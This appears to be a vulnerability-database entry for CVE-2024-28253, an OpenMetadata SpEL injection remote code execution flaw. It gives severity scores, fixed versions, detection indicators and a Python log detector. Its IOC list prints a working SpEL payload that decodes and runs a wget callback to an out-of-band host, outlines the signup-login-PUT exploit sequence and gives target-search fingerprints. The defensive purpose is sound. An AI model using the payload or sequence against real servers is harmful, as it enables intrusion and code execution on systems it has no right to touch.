CVE-2024-28253
published 2024-03-15


Priority: P1 83
Severity: high, 8.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ITW exploit: VulnCheck KEV (exploited in the wild)
EPSS: 12.53% (95.7th percentile)
OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. `CompiledRule::validateExpression` is also called from `PolicyRepository.prepare`. `prepare()` is called from `EntityRepository.prepareInternal()` which, in turn, gets called from `EntityResource.createOrUpdate()`. Note that even though there is an authorization check (`authorizer.authorize()`), it gets called after `prepareInternal()` gets called and therefore after the SpEL expression has been evaluated. In order to reach this method, an attacker can send a PUT request to `/api/v1/policies` which gets handled by `PolicyResource.createOrUpdate()`. This vulnerability was discovered with the help of CodeQL's Expression language injection (Spring) query and is also tracked as `GHSL-2023-252`. This issue may lead to Remote Code Execution and has been addressed in version 1.3.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Affected (1 range)

Vendor          Product        Version range   Fixed in
open-metadata   openmetadata   < 1.3.1         1.3.1

Detection & IOCs (extracted from sources)

url: PUT /api/v1/policies
path: /api/v1/policies
command: T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode('{{base64("wget http://{{interactsh-url}}")}}')))
other: shodan:http.favicon.hash:733091897
other: fofa:icon_hash="733091897"
  • Monitor for unauthenticated or low-privilege PUT requests to /api/v1/policies containing SpEL expressions with Java runtime invocations (e.g., T(java.lang.Runtime).getRuntime().exec) in the 'condition' field of policy rules.
  • The exploit flow involves three steps: (1) POST /api/v1/users/signup to register a new user, (2) POST /api/v1/users/login to obtain a Bearer token, (3) PUT /api/v1/policies with a malicious SpEL condition. Detect this sequence in HTTP logs.
  • Detect the authorization header pattern 'Bearer <token>' on PUT /api/v1/policies requests from newly registered accounts (accounts created moments before the exploit attempt).
  • Look for outbound DNS or HTTP callbacks (OAST/interactsh interactions) originating from OpenMetadata containers following PUT /api/v1/policies requests, indicating successful SpEL RCE.
  • In Kubernetes environments, enumerate OpenMetadata pods and check image versions prior to 1.2.4/1.3.1 as actively exploited targets: kubectl get pods --all-namespaces -o=jsonpath='{range .items[*]}{.spec.containers[*].image}{"\n"}{end}' | grep 'openmetadata'
  • Post-exploitation indicators include cronjob creation for persistence, Netcat reverse shell connections, and outbound connections to a remote server in China for cryptomining payload download.
  • The SpEL injection payload uses Base64-encoded commands passed to T(java.util.Base64).getDecoder().decode() within the 'condition' field — alert on policy rule conditions containing 'T(java.' class references.
  • The authorization check (authorizer.authorize()) is called after prepareInternal() and the SpEL expression evaluation, so even authenticated low-privilege users can trigger RCE before authorization is enforced.
  • The vulnerability affects OpenMetadata versions prior to 1.2.4 and 1.3.1. The NVD advisory references the fix in 1.3.1, while the BleepingComputer article states patches were available in 1.2.4 and newer; confirm the correct patched version for your release branch.
  • Default credentials on OpenMetadata deployments increase risk; attackers can self-register new accounts via /api/v1/users/signup (no prior authentication required) to obtain a token for exploitation.
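The two log-based detections above (rule conditions referencing Java classes on PUT /api/v1/policies, and the signup → login → PUT sequence from one source) implemented over a constructed log. This is an added example, not code from this page or from the OpenMetadata project; it assumes a JSON-lines request log from a gateway or WAF in front of OpenMetadata with fields ts, src, user, method, path, status and body, which is not a real OpenMetadata log format. The constructed PUT deliberately carries a 403, because the advisory's point is that the SpEL condition is evaluated before authorizer.authorize() runs, so a denied response must not suppress the alert.

```python
import json
import re
from datetime import datetime, timedelta

# Constructed sample (field names are assumptions, not a real OpenMetadata log).
# The 403 on the PUT is deliberate: per the advisory, the SpEL condition is
# evaluated in prepare() before the authorization check.
SAMPLE_LOG = r'''
{"ts": "2024-03-20T10:00:01Z", "src": "203.0.113.7", "user": "-", "method": "POST", "path": "/api/v1/users/signup", "status": 201, "body": "{\"name\":\"newuser\"}"}
{"ts": "2024-03-20T10:00:04Z", "src": "203.0.113.7", "user": "-", "method": "POST", "path": "/api/v1/users/login", "status": 200, "body": ""}
{"ts": "2024-03-20T10:00:09Z", "src": "203.0.113.7", "user": "newuser", "method": "PUT", "path": "/api/v1/policies", "status": 403, "body": "{\"name\":\"p\",\"rules\":[{\"name\":\"r\",\"condition\":\"T(java.lang.Runtime).getRuntime().exec(...)\"}]}"}
{"ts": "2024-03-20T11:15:00Z", "src": "198.51.100.4", "user": "admin", "method": "PUT", "path": "/api/v1/policies", "status": 200, "body": "{\"name\":\"pii\",\"rules\":[{\"name\":\"r\",\"condition\":\"matchAnyTag('PII.Sensitive')\"}]}"}
'''

# Class references and runtime/decoder calls named in the IOC list above.
SPEL_JAVA_REF = re.compile(r"T\(java\.|getRuntime\(\)\s*\.\s*exec\(|Base64\)\.getDecoder\(\)")

POLICY_PATH = "/api/v1/policies"
SEQUENCE = ("/api/v1/users/signup", "/api/v1/users/login", POLICY_PATH)


def parse_log(text):
    """Parse JSON lines into events with a datetime 'ts'; skip blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
            ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        except (ValueError, KeyError):
            continue
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def rule_conditions(body):
    """Return every rules[].condition string from a policy request body, tolerating junk."""
    try:
        doc = json.loads(body) if body else {}
    except ValueError:
        return []
    rules = doc.get("rules", []) if isinstance(doc, dict) else []
    return [r.get("condition", "") for r in rules if isinstance(r, dict)]


def find_spel_policy_writes(events):
    """Flag PUT /api/v1/policies whose rule conditions reference Java classes.

    The response status is deliberately ignored: the expression runs before
    the authorization check, so a 403 does not mean nothing was evaluated.
    """
    alerts = []
    for ev in events:
        if ev.get("method") != "PUT" or ev.get("path") != POLICY_PATH:
            continue
        for cond in rule_conditions(ev.get("body", "")):
            if SPEL_JAVA_REF.search(cond):
                alerts.append({"ts": ev["ts"], "src": ev["src"],
                               "user": ev.get("user"), "condition": cond})
    return alerts


def find_signup_login_policy_sequences(events, window=timedelta(minutes=10)):
    """Return sources that did signup -> login -> PUT policies, in order, within `window`."""
    hits = []
    by_src = {}
    for ev in events:
        by_src.setdefault(ev["src"], []).append(ev)
    for src, evs in by_src.items():
        stage, start = 0, None
        for ev in evs:
            if start is not None and ev["ts"] - start > window:
                stage, start = 0, None  # sequence too slow: restart the state machine
            expected_method = "PUT" if stage == 2 else "POST"
            if ev.get("method") == expected_method and ev.get("path") == SEQUENCE[stage]:
                start = start or ev["ts"]
                stage += 1
                if stage == len(SEQUENCE):
                    hits.append({"src": src, "start": start, "end": ev["ts"]})
                    break
    return hits


def analyze(text):
    """Run both detections over a JSON-lines log and return the alerts by rule."""
    events = parse_log(text)
    return {
        "spel_policy_writes": find_spel_policy_writes(events),
        "signup_login_policy_sequences": find_signup_login_policy_sequences(events),
    }


if __name__ == "__main__":
    for name, alerts in analyze(SAMPLE_LOG).items():
        print(name)
        for alert in alerts:
            print("  ", alert)
```

On the constructed log, the first rule flags only the 203.0.113.7 PUT (the admin's matchAnyTag condition is left alone), and the sequence rule flags the same source for completing signup, login and PUT within eight seconds. Because the body is needed to inspect the condition field, this only works where a gateway or WAF records request bodies; plain access logs can still feed the sequence rule.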

CVSS provenance

nvd: v3.1 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vulncheck: 9.4 CRITICAL